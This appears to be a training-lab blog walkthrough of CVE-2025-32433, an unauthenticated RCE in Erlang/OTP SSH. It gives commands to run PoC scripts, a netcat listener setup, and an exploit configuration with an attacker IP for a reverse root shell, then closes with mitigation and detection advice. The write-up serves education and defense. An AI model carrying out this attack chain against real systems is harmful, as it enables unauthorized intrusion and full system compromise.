Blog
PoC & Research
CVE-2025-32433 – Erlang OTP SSH Unauthenticated RCE to Reverse Shell

CVE-2025-32433 – Erlang OTP SSH Unauthenticated RCE to Reverse Shell

August 27, 2025·
CyberTask Team

Quick Info

Property Value
Platform CyberTask
Difficulty Easy
Category SSH Exploitation / CVE / RCE
Tasks 3
Cost Free
Access Browser-based (No VPN required)
⚠️ Critical Severity Vulnerability! CVE-2025-32433 allows unauthenticated remote code execution on Erlang/OTP SSH servers. If you’re running affected versions, patch immediately.

Lab Topology Lab topology: Attacker (Kali 203.0.113.99) → Target (Ubuntu 192.168.10.4:2222)

TL;DR

This walkthrough demonstrates CVE-2025-32433, a critical pre-authentication RCE vulnerability in Erlang/OTP SSH server. You’ll exploit a flaw in SSH protocol message handling to execute arbitrary code without credentials, ultimately obtaining a reverse shell with root privileges.

What You’ll Learn

  • Understanding CVE-2025-32433 and its impact
  • Setting up a vulnerable Erlang SSH daemon
  • Exploiting pre-auth RCE via crafted SSH packets
  • Establishing reverse shell connections
  • Post-exploitation verification techniques

Vulnerability Overview

Property Value
CVE ID CVE-2025-32433
Severity Critical
Type Unauthenticated Remote Code Execution
Attack Vector Network

Affected Versions

OTP Version Vulnerable Range
OTP-27 ≤ 27.3.2
OTP-26 ≤ 26.2.5.10
OTP-25 ≤ 25.3.2.19

Fixed Versions

  • 27.3.3
  • 26.2.5.11
  • 25.3.2.20

Root Cause

A flaw in SSH protocol message handling allows an attacker to send a crafted pre-authentication packet that the Erlang daemon evaluates as Erlang code, resulting in arbitrary command execution without any credentials.

Lab Topology

Role IP Address Port Description
Target 192.168.10.4 2222 Ubuntu with Erlang SSH daemon
Attacker 203.0.113.99 4444 Kali Linux running exploit scripts

Task 1: Understand and Exploit the Vulnerability

This task walks through setting up a vulnerable Erlang SSH daemon and exploiting it to create a file on the target system.

Step 1: Compile the Custom SSH Daemon

On the Target machine (192.168.10.4), compile the Erlang module that exposes the built-in SSH service:

target
sudo erlc /root/start_ssh.erl

This compiles a minimal Erlang module that will start an SSH daemon on a custom port.

Step 2: Launch the Daemon

Start the Erlang SSH daemon on port 2222:

target
sudo erl -noshell -detached -s start_ssh start

Verify the daemon is listening:

target
ss -ltnp | grep 2222

You should see output confirming the service is bound to port 2222.

Step 3: Validate Basic Access

Switch to the Attacker machine (Kali) and verify the daemon accepts connections:

attacker
ssh labuser@192.168.10.4 -p 2222

Press Ctrl+C to exit after confirming the connection prompt appears.

Step 4: Execute the PoC Exploit

On Kali, navigate to the Desktop and run the proof-of-concept exploit:

attacker
cd Desktop
python3 CVE-2025-32433-Exploit.py

This script crafts malicious SSH packets that bypass authentication and inject Erlang code to create a file on the target.

Step 5: Validate Impact

Return to the Target machine and verify the exploit succeeded:

target
sudo cat /tmp/lab.txt

If successful, you’ll see the file contents confirming code execution occurred without authentication.

The PoC creates /tmp/lab.txt as proof of RCE. In real attacks, this could be any command—including downloading and executing malware.

Task 2: Reverse Shell Exploit

Now let’s escalate from simple file creation to full interactive shell access.

Step 1: Ensure Daemon is Running

On the Target, verify the SSH daemon is still active:

target
ss -ltnp | grep 2222

If not running, restart it:

target
sudo erl -noshell -detached -s start_ssh start

Step 2: Set Up Reverse Shell Listener

On the Attacker (Kali), open a terminal and start a netcat listener:

attacker
nc -lvnp 4444
Flag Description
-l Listen mode
-v Verbose output
-n No DNS resolution
-p 4444 Listen on port 4444

Leave this terminal open—it will receive the incoming shell connection.

Step 3: Review and Execute the Exploit

Open a new terminal on Kali and examine the reverse shell exploit script:

attacker
cat Desktop/CVE-2025-32433-Reverse_Exploit.py

Verify the configuration matches your lab topology:

HOST = "192.168.10.4"      # Target
PORT = 2222
ATTACKER_IP = "203.0.113.99"
ATTACKER_PORT = 4444

Execute the exploit:

attacker
cd Desktop
python3 CVE-2025-32433-Reverse_Exploit.py

Expected Output 

[ * ] banner exchange
[ ✓ ] payload injected - check your listener!

The script crafts SSH packets that inject an Erlang os:cmd call, triggering a reverse shell back to your listener.

Step 4: Verify Shell Access

Switch back to your netcat listener terminal. If successful, you’ll see:

Connection received on 192.168.10.4 XXXXX

You now have an interactive shell on the target. Verify your access:

shell
id
whoami
Root Access! If the Erlang daemon runs as root (common for services binding to privileged ports), your shell will have root privileges—complete system compromise.

Task 3: Additional References

For deeper understanding of CVE-2025-32433:

Official Advisory

Exploit Code & Analysis

Related Resources

Mitigation & Defense

Immediate Actions

Action Priority Description
Patch Critical Upgrade to OTP 27.3.3, 26.2.5.11, or 25.3.2.20
Disable High If patching isn’t immediate, disable Erlang SSH daemon
Firewall High Restrict SSH port access to trusted IPs only
Monitor Medium Watch for unusual SSH connection patterns

Detection Indicators

  • Unexpected connections to Erlang SSH ports
  • SSH authentication bypass attempts
  • Unusual process spawning from Erlang beam processes
  • Files created in /tmp or other world-writable directories

Long-term Recommendations

  1. Network Segmentation: Isolate Erlang services from untrusted networks
  2. Least Privilege: Run Erlang daemons as non-root users when possible
  3. Monitoring: Implement SSH connection logging and anomaly detection
  4. Patch Management: Establish rapid patching procedures for critical CVEs

FAQ

What is CVE-2025-32433?

CVE-2025-32433 is a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. It allows attackers to execute arbitrary commands without providing valid credentials by exploiting a flaw in SSH protocol message handling.

Why is this vulnerability critical?

The vulnerability requires no authentication—any attacker who can reach the SSH port can execute commands. If the daemon runs as root (common), this grants complete system control.

What systems are affected?

Any system running Erlang/OTP SSH daemon with versions OTP-27 ≤ 27.3.2, OTP-26 ≤ 26.2.5.10, or OTP-25 ≤ 25.3.2.19. This includes applications built on Erlang that expose SSH interfaces.

How does the exploit work?

The attacker sends specially crafted SSH protocol messages during the pre-authentication phase. Due to improper input validation, the Erlang daemon interprets part of the message as Erlang code and executes it via os:cmd.

How can I check if I’m vulnerable?

Check your Erlang/OTP version with erl -version. If it falls within the affected ranges and you’re running an SSH daemon, you’re vulnerable.

What’s the fix?

Upgrade to patched versions: OTP 27.3.3, 26.2.5.11, or 25.3.2.20. If immediate patching isn’t possible, disable the SSH daemon or restrict network access via firewall.

Conclusion

CVE-2025-32433 demonstrates the devastating impact of pre-authentication vulnerabilities. A single crafted packet can transform network access into complete system compromise. This lab walked you through the full attack chain—from initial exploitation to interactive root shell.

Key takeaways:

  • Pre-auth vulnerabilities bypass all authentication controls
  • Services running as root amplify exploit impact
  • Rapid patching is critical for publicly disclosed CVEs
  • Network segmentation provides defense-in-depth

Start the Erlang SSH RCE Lab →

Resources

Apache CVE-2021-42013 – Path Traversal & Remote Code Execution Walkthrough